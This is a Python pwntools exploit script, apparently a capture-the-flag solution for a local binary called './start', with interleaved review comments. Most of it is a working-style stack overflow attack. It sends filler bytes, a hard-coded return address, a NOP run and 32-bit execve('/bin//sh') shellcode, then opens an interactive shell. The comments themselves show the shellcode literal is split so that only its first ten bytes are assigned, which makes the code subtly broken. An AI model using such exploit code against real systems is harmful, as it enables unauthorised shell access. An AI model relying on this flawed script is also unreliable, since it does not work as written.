- #!/usr/bin/env python2
- # -*- coding: utf-8 -*-
- from pwn import *
- # Local proof-of-concept against the ./start binary (not shown here), using
- # what appears to be a stack buffer overflow: the input is 20 filler bytes,
- # a 4-byte value named EIP, a short NOP run and a 32-bit x86 code stub.
- # NOTE(review): this pattern depends on an executable stack and a predictable
- # stack address in the target; NX/DEP, ASLR and stack canaries are the
- # standard mitigations. The binary's actual protections are not visible here.
- #
- # Raw x86 machine code; the embedded ASCII bytes spell "/bin//sh" and the
- # sequence ends in int 0x80 (cd 80), the 32-bit Linux system-call instruction.
- # NOTE(review): as listed, the two literals on the following lines are
- # standalone expression statements, so only the first ten bytes are bound
- # to SHELLCODE.
- SHELLCODE = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f"
- "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd"
- "\x80";
- # Hard-coded stack address (0xffffd254 minus 160) packed by p32 as a 32-bit
- # value. NOTE(review): a fixed address like this is only meaningful where the
- # stack layout is reproducible (e.g. ASLR disabled); presumably it is meant
- # to land on the saved return address. Confirm against the binary.
- EIP = p32(0xffffd254 - 80 - 80)
- # 15 x86 NOP bytes (0x90) placed ahead of the code stub; the name is
- # presumably a misspelling of "NOP sled".
- NOPSLEP = "\x90" * 15
- # Start the target as a local child process; the remote endpoint below is
- # left commented out by the author.
- s = process('./start')
- #s = remote('chall.pwnable.tw', 10000)
- # Layout: 20 filler bytes, then EIP, then the NOP run, then SHELLCODE.
- PAYLOAD = "A" * 20 + EIP + NOPSLEP + SHELLCODE
- # Consume the target's output up to the first ':' before sending input.
- s.readuntil(':')
- s.send(PAYLOAD)
- # Hand the session over to the user; 'PWNED#' is passed as the prompt string.
- s.interactive('PWNED#')